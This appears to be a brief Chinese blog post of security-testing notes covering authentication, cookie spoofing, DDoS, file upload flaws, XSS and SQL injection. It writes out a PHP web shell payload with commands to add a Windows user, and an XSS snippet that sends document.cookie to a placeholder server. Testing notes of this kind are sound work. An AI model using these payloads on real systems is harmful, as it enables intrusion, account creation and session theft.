安全测试

从4方面考虑

1.认证与授权

1.1认证

1.2权限

1.3避免未经授权的页面可以直接访问

2.session与cookie

通过抓包工具或者F12查看

2.1session与cookie欺骗

2.2防止作用域为根目录

3.ddos拒绝服务攻击

意思就是疯狂地向服务器发送请求,导致服务器崩溃

3.1使用肉鸡

3.2攻击联盟

4.文件上传漏洞

4.1比如:创建一个后缀为.PHP的文件,代码为   <?php phpinfo( );?>   若有漏洞,会将服务器的情况展现出来

4.2 在输入框输入 <?php system($_GET['cmd']);?>    保存成功后刷洗页面,在URL地址后面输入?cmd=dir  ;   dir  a;   net user hello/add;  net user hello/delet;

5.XSS跨站攻击

cross site script ,即往web页面插入恶意HTML代码,当用户浏览该页时,嵌入其中的代码被执行,

以下是进行跨站攻击使用的一些脚本

<input type="button"    value="点我"   onclick="alert('你好')" />

<input type="button"    value="点我"   onclick="alert(document.cookie)" />       此时的cookie读取了但未保存

<input type="button"    value="点我"   onclick="location.href='http://服务器地址/cookie.php?cookie='+docunment.cookie"/ > 

6.sql注入

https://www.cnblogs.com/imyalost/p/8243128.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • HTTP.sys远程代码执行 测试类型:基础结构测试 威胁分类:操作系统命令 原因:未安装第三方产品的最新补丁或最...
    天天向上的小M阅读 3,999评论 0 0
  • 认证与授权 攻击 未经授权的页面可以直接访问 防御 APPScan扫描工具 SessionID-Cookie欺骗 ...
    西瓜加糖阅读 735评论 0 2
  • 每天六点醒来,头晕晕沉沉,太阳穴好像被从里面顶着,这是怎么了? 睡眠质量太差吧,也不能这样呀。睡得早晚都得这样。不...
    啸儿的天空阅读 61评论 0 1
  • chy常红艳阅读 133评论 0 0
  • 老马哥四天前就找我,要我周二做班级汇报。我隐约里感觉老马哥有什么新的玩法,便多问了几句,他说就是想提前定好。昨晚他...
    嗨蔡园园阅读 481评论 4 11